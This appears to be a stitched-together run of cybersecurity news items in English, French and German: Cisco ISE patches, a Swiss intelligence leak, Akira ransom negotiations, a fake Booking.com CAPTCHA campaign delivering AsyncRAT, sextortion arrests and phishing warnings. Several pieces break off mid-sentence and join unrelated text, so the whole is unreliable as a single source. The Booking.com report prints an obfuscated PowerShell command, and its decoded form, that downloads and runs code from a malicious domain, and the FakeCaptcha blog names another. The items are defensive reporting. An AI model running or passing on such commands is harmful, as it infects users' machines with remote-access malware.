Cisco has released patches to address three vulnerabilities with public exploit code in its Identity Services Engine (ISE) and Customer Collaboration Platform (CCP) solutions.
The most severe of the three is a critical static credential vulnerability tracked as CVE-2025-20286, found by GMO Cybersecurity's Kentaro Kawane in Cisco ISE. This identity-based policy enforcement software provides endpoint access control and network device administration in enterprise environments.
The vulnerability is due to improperly generated credentials when deploying Cisco ISE on cloud platforms, resulting in shared credentials across different deployments.
Unauthenticated attackers can exploit it by extracting user credentials from Cisco ISE cloud deployments and using them to access installations in other cloud environments. However, as Cisco explained, threat actors can exploit this flaw successfully only if the Primary Administration node is deployed in the cloud.
"A vulnerability in Amazon Web Services (AWS), Microsoft Azure, and Oracle Cloud Infrastructure (OCI) cloud deployments of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to access sensitive data, execute limited administrative operations, modify system configurations, or disrupt services within the impacted systems," the company explained.
Le Département fédéral de la Défense a ouvert une enquête administrative sur une présumée transmission d'informations sensibles du Service de renseignement de la Confédération (SRC) à la Russie entre 2015 et 2020, notamment via l'entreprise russe de cybersécurité Kaspersky. Cette affaire de fuites de données sensibles apparaît dans un rapport interne du SRC que SRF Investigativ a pu consulter.
En novembre 2020, des services secrets alliés mettent en garde le service de renseignement suisse de potentielles fuites d'informations sensibles aux services secrets russes. Après enquête, le SRC reconnaît ces allégations de "partage illégal de données" dans un rapport secret datant de 2021, que SRF Investigativ a pu consulter. Selon ce rapport, un agent des services de renseignement suisses aurait effectivement transmis des informations hautement sensibles à Kaspersky, une société russe de cybersécurité.
L'information aurait ensuite été divulguée aux services de renseignement russes via Kaspersky, d'après une deuxième agence de renseignement alliée, faisant courir "un risque de mise en danger de vies humaines". Les deux services de renseignement "amis", essentiels pour le travail du SRC et la sécurité de la Suisse, ont menacé de "cesser toute coopération avec le SRC" si l'employé mis en cause à la tête du service cyber du SRC continuait à y travailler.
Kaspersky, le premier des "contacts réguliers" de l'équipe cyber du SRC
Kaspersky a déjà été accusé à plusieurs reprises de collaborer avec le Kremlin et ses services secrets. L'entreprise, avec laquelle le SRC a collaboré, est donc évitée depuis des années par les services gouvernementaux de nombreux pays occidentaux.
Mais pour l'équipe cyber du SRC, l'entreprise Kaspersky arrive en tête d'un rapport classé sous la rubrique "Contacts réguliers". La société de cybersécurité serait "essentielle" pour le travail de l'équipe cyber, avait d'ailleurs déclaré l'ancien chef de cette équipe mis en cause par les services de renseignement alliés. Selon lui, "le SRC ne dispose pas de l'expertise et des ressources suffisantes pour détecter de manière indépendante et préventive les activités de pira
Hello and welcome back to another blog post. After some time of absence due to a lot of changes in my personal life ( finished university, started a new job, etc), I am happy to finally be able to present something new.
Chapter 1: Captcha-verified Victim
This story starts with a message by one of my long time internet contacts:
Figure 1: Shit hit the Fan
I assume, some of you can already tell from this message alone that something terrible had just happend to him.
The legitimate website of the German Association for International Law had redirected him to an apparent Cloudflare Captcha site asking him to execute a Powershell command on device that does a Webrequest (iwr = Invoke-WebRequest) to a remote website (amoliera[.]com) and then pipes the response into “iex” which stands for Invoke-Expression.
Thats a text-book example for a so called FakeCaptcha attack.
For those of you that do not know what the FakeCaptcha attack technique is, let me give you a short primer:
A Captcha in itself is a legitimate method Website Owners use to differentiate between bots (automated traffic) and real human users. It often involves at-least clicking a button but can additionally require the website visitor to solve different form of small tasks like clicking certain images out of a collection of random images or identifying a bunch of obscurely written letters. The goal is to only let users visit the website that are able to solve these tasks, which are often designed to be hard for computers but easy for human beings. Well, most of the times.
Over on SuspectFile, @amvinfe has been busy exposing Akira’s false promises to its victims. In two posts this week, he reports on what happened with one business in New Jersey and one in Germany that decided to pay Akira’s ransom demands. He was able to report on it all because Akira failed to secure its negotiations chat server. Anyone who knows where to look can follow along if a victim contacts Akira to try to negotiate any payment for a decryptor or data deletion.
In one case, the victim paid Akira $200k after repeatedly asking for — and getting — assurances that this would all be kept confidential. In the second case, Akira demanded $6.9 million but eventually accepted that victim’s offer of $800k. The negotiations made clear that Akira had read the terms of the victim’s cyberinsurance policy and used that to calculate their demands.
If the two victims hoped to keep their names or their breaches out of the news, they may have failed. Although SuspectFile did not name them, others with access to the chats might report on the incidents. Anyone who read the chats would possess the file lists of everything Akira claimed to have exfiltrated from each victim. Depending on their file-naming conventions, filenames may reveal proprietary or sensitive information and often reveal the name of the victim.
So the take-home messages for current victims of Akira:
Akira has not been keeping its negotiations with you secure and confidential.
Paying Akira’s ransom demands is no guarantee that others will not obtain your data or find out about your breach.
Even just negotiating with Akira may be sufficient to provide researchers and journalists with data you do not want shared.
If you pay Akira and they actually give you accurate information about how they gained access and elevated privileges, you are now more at risk from other attackers while you figure out how to secure your network.
We found that cybercriminals are preparing for the impending holiday season with a redirect campaign leading to AsyncRAT.
Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers.
The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days.
Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device.
fake Captcha
fake Captcha prompt
As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard.
Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals.
instructions for the visitor
instructions to infect your own device
If you’re using Chrome, you may see this warning:
Chrome warns but for what?
Chrome issues a warning but it may the danger may be unclear to users
The warning is nice, but it’s not very clear what this warning is for, in my opinion.
Users of Malwarebytes’ Browser Guard will see this warning:
Browser Guard clipboard warning
Malwarebytes Browser Guard’s clipboard warning
“Hey, did you just copy something?
Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.”
Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow.
What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger.
pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"
The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is:
powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"
The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase Suspicious Content at the front of the copied content which makes it an invalid command and the user will see a warning instead of having infected themselves.
Should a user fall for this without any protections enabled, the command will open a hidden powershell window to download and execute a file called ckjg.exe which in turn would download and execute a file called Stub.exe which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT.
Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT.
The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft.
IOCs
The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones.
(booking.)chargesguestescenter[.]com
(booking.)badgustrewivers.com[.]com
(booking.)property-paids[.]com
(booking.)rewiewqproperty[.]com
(booking.)extranet-listing[.]com
(booking.)guestsalerts[.]com
(booking.)gustescharge[.]com
kvhandelregis[.]com
patheer-moreinfo[.]com
guestalerthelp[.]com
rewiewwselect[.]com
hekpaharma[.]com
bkngnet[.]com
partnervrft[.]com
The AFP has played a key role in a landmark international operation targeting perpetrators of online sextortion, which resulted in the arrest of 22 suspects in Nigeria.
CORRECTION: The arrest of two Nigerian-based offenders linked to the suicide of a 16-year-old child in New South Wales in 2023 was NOT part of Operation Artemis. Those arrests occurred after Operation Artemis, when they were conducted by Nigeria’s Economic and Financial Crimes Commission to assist a NSW Police Force investigation.
The AFP has played a key role in a landmark international operation targeting perpetrators of online sextortion, which resulted in the arrest of 22 suspects in Nigeria.
Operation Artemis was a joint operation led by the US Federal Bureau of Investigation in partnership with the AFP, Royal Canadian Mounted Police, and Nigeria’s Economic and Financial Crimes Commission (EFCC). It focused on dismantling an organised criminal network allegedly responsible for a wave of online sextortion crimes which targeted thousands of teenagers globally.
The network’s scheme, which coerced victims into sharing sexually explicit images before threatening to distribute those images unless payment was made, had devastating consequences.
In the United States alone, more than 20 teenage suicides have been linked to sextortion-related cases since 2021. While many victims were based in North America, the ripple effects of the offending extended to Australia and other nations.
The hack into the account of the country’s top security official has drawn criticism online.
Malaysia’s home minister had his WhatsApp account hacked and then abused to send malicious links to his contacts, according to police.
The attacker reportedly used a virtual private network (VPN) to compromise the account of Datuk Seri Saifuddin Nasution Ismail, authorities said at a press conference on Friday, adding that no victims have reported financial losses so far. They did not elaborate on how the hack was carried out.
The Ministry of Home Affairs, which oversees law enforcement, immigration and censorship, confirmed the incident and urged the public not to respond to any messages or calls claiming to be from the minister, especially those involving financial or personal requests.
The breach is under investigation and law enforcement is working to determine the hacker’s location.
Mobile phishing scams have become increasingly common in Malaysia. Local media have reported that citizens are frequently targeted by fraudsters posing as police, bank officials or court representatives.
The recent WhatsApp incident follows similar attacks on other high-ranking officials. In March, scammers hijacked the WhatsApp account of parliamentary speaker Johari Abdul and tricked some of his contacts into sending money. In 2022, threat actors accessed Telegram and Signal accounts belonging to former Prime Minister Ismail Sabri. And in 2015, hackers took over the Royal Malaysia Police’s Twitter and Facebook accounts, posting pro-Islamic State group messages.
Nasution Ismail faced online criticism and ridicule following the WhatsApp hack, with local media reporting that citizens questioned the strength of Malaysia’s cybersecurity measures, given that the country’s top security official had been successfully targeted by hackers.
The compliance company said the customer data exposure was caused by a product change.
ompliance company Vanta has confirmed that a bug exposed the private data of some of its customers to other Vanta customers. The company told TechCrunch that the data exposure was a result of a product code change and not caused by an intrusion.
Vanta, which helps corporate customers automate their security and compliance processes, said it identified an issue on May 26 and that remediation will complete June 4.
The incident resulted in “a subset of data from fewer than 20% of our third-party integrations being exposed to other Vanta customers,” according to the statement attributed to Vanta’s chief product officer Jeremy Epling.
Epling said fewer than 4% of Vanta customers were affected, and have all been notified. Vanta has more than 10,000 customers, according to its website, suggesting the data exposure likely affects hundreds of Vanta customers.
One customer affected by the incident told TechCrunch that Vanta had notified them of the data exposure. The customer said Vanta told them that “employee account data was erroneously pulled into your Vanta instance, as well as out of your Vanta instance into other customers’ instances.”
The Moroccan National Agency for Land Conservation, Cadastre and Cartography (ANCFCC) has become the latest victim of a major cyberattack claimed by “Jabaroot,” the same hacker group behind April’s CNSS breach.
The group, which identifies itself as Algerian, announced the attack on Monday, allegedly resulting in the theft and subsequent leak of thousands of sensitive property documents.
According to claims the group made on their Telegram channel, the hackers have exfiltrated and released what they describe as “a massive amount of sensitive data” from ANCFCC’s databases.
The leaked information reportedly includes 10,000 property ownership certificates out of a total database of more than 10 million land titles.
The compromised data allegedly contains cadastral information, property owner identities, real estate references, and various personal and administrative documents.
Sports apparel and footwear giant VF Corporation is notifying over 2,800 individuals that their personal information was compromised in a recent credential stuffing attack aimed at The North Face website.
Credential stuffing occurs when threat actors leverage email addresses, usernames, and passwords compromised in a previous data breach to access accounts on a different online service where the same credentials have been used.
According to notification letters VF Corporation sent this week to the impacted individuals, copies of which were submitted to multiple regulators, a threat actor employed this technique on April 23 against a small set of user accounts on thenorthface.com website.
“Based on our investigation, we believe that the attacker previously gained access to your email address and password from another source (not from us) and then used those same credentials to access your account on our website,” the company’s notification letter reads.
VF Corporation says it discovered the suspicious activity on the same day, and informed the Maine Attorney General’s Office that a total of 2,861 user accounts were compromised.
The campaign resulted in the attackers gaining access to the information stored in the compromised accounts, such as names, addresses, email addresses, dates of birth, phone numbers, user preferences, and details on the items purchased on the website.
The company underlines that payment card information was not compromised because it does not store such data on its website.
“We only retain a ‘token’ linked to your payment card, and only our third-party payment card processor keeps payment card details. The token cannot be used to initiate a purchase anywhere other than on our website. Accordingly, your credit card information is not at risk as a result of this incident,” it says.
03.06.2025 - Le phishing fait partie depuis des années des cyberdélits les plus fréquemment signalés. Il s’agit d’un phénomène de masse. Les cybercriminels envoient de grandes quantités d’e-mails dans l’espoir qu’un petit pourcentage des destinataires se fasse piéger. Les attaquants misent ici sur la quantité plutôt que sur la qualité. L’OFCS observe toutefois de plus en plus d’attaques ciblées. Ces dernières sont certes moins nombreuses et plus coûteuses, mais offrent un meilleur taux de réussite. La semaine dernière, un cas particulier utilisant une méthode en deux étapes a été signalé à l’OFCS, illustrant la complexité croissante des attaques par hameçonnage.
La semaine dernière, un cas particulier d’attaque en deux temps a été signalé à l’OFCS, témoignant de la sophistication croissante des tentatives d’hameçonnage. La nouvelle technique utilisée commence de manière apparemment anodine par l’envoi d’un e-mail qui semble provenir d’une banque. Dans le cadre d’une prétendue directive de conformité d’un établissement financier et afin de garantir l’exactitude des données clients, il est demandé à l’utilisateur de mettre à jour ses informations personnelles.
E-mail prétendant que les données client doivent être mises à jour.
Après avoir cliqué sur le lien, une page web s’ouvre. Elle ressemble à s’y méprendre au site web de la banque correspondante. Des données telles que des numéros de contrat (p. ex. contrat e-banking), des noms et des numéros de téléphone y sont demandés. De nombreux internautes saisissent ces informations sans se poser de questions, car elles ne semblent pas particulièrement sensibles à première vue. Il n’est pas nécessaire d’indiquer les données de carte de crédit ou les mots de passe. Une fois les données saisies, l’utilisateur est redirigé vers la page d’accueil de la banque correspondante.
Il ne s’agit donc pas d’une attaque de phishing classique. Habituellement, l’OFCS recommande d’ailleurs simplement d’être particulièrement vigilant sur les sites web qui demandent des informations sensibles telles que des données de carte de crédit ou des mots de passe. C’est précisément ce qui rend cette méthode si dangereuse, comme le montre la suite de l’attaque.
Derzeit sind E-Mails mit einem gefälschten Absender namens «Kanton Schaffhausen» im Umlauf. In der Mail wird eine Rückerstattung versprochen. Der enthaltene Link führt zum Download von einer Software, die die Fernsteuerung Ihres Computers ermöglicht.
Diese E-Mails sind gefälscht und stammen nicht vom Kanton Schaffhausen.
Was Sie tun sollten:
Folgen Sie keinesfalls den darin enthaltenen Instruktionen
Löschen Sie die Mail und markieren Sie die Mail als Spam
Falls Sie den Link bereits angeklickt haben und die Software zur Fernsteuerung Ihres Computers installiert wurde:
Entfernen Sie die installierte Software und setzen Sie den Computer frisch auf.
Ändern Sie sofort Ihre Passwörter.
Überprüfen Sie, ob Ihre E-Mail-Adresse und Passwörter bereits in falsche Hände geraten oder im Internet missbraucht worden sind: https://www.ibarry.ch/de/sicherheits-checks
Beobachten Sie Ihr Bankkonto und kontaktieren Sie bei Verdacht Ihre Bank. Vor allem wenn Sie mit diesem Computer in der Zwischenzeit auf Ihr Bankkonto zugegriffen haben.
Melden Sie den Vorfall (freiwillig) beim Bundesamt für Cybersicherheit BACS:
https://www.report.ncsc.admin.ch/
Reichen Sie online eine Strafanzeige bei der Polizei ein:https://www.suisse-epolice.ch, falls sie geschädigt wurden.
Schauen Sie sich die Tipps und Infos rund um Phishing und Cybersicherheit auf: https://www.s-u-p-e-r.ch
Des escrocs inondent Facebook de promotions sur des sacs à dos Decathlon notamment. Voici leur technique et leurs objectifs.
Les faux concours sur Facebook nous divertissent depuis plus de dix ans, et l’arnaque reste efficace: depuis quelques mois, les posts rémunérés se multiplient, promettant notamment un sac à dos Decathlon à deux francs.
Ainsi, une certaine Nadine Keller ou encore une Sophie Delacroix – bref, une jeune femme sympathique avec un petit chien trop mignon – nous raconte que sa mère a été licenciée de manière totalement injustifiée par son employeur (pour Sophie Delacroix, c'est son mec), mais passons. L'employeur? Decathlon.
Elle révèle donc quelque chose que seuls les employés du fabricant sons censés savoir: en remplissant un petit sondage en ligne, on recevra un sac à dos The North Face. Pour se venger de Decathlon, elle partage le lien vers l'enquête afin d'en faire profiter le plus de personnes possible.
Des publications de ce genre sont envoyées en masse par de faux profils créés tous les jours. Et ce, avec à chaque fois un libellé légèrement modifié et de nouvelles «photos de preuve» de sacs à dos soi-disant achetés pour deux francs. L'arnaque dure depuis des mois notamment en France et en Belgique, aujourd'hui, elle est chez nous.
Des dizaines de comptes proposent des arnaques avec Decathlon. En français, on trouve pas mal d'offres en euro.
Image: facebook/watson
Les criminels ont par ailleurs un bon argument pour justifier un prix si bas: avec les droits de douane de Trump sur les produits de l'UE, les stocks sont pleins. Il faut donc désormais brader les marchandises.
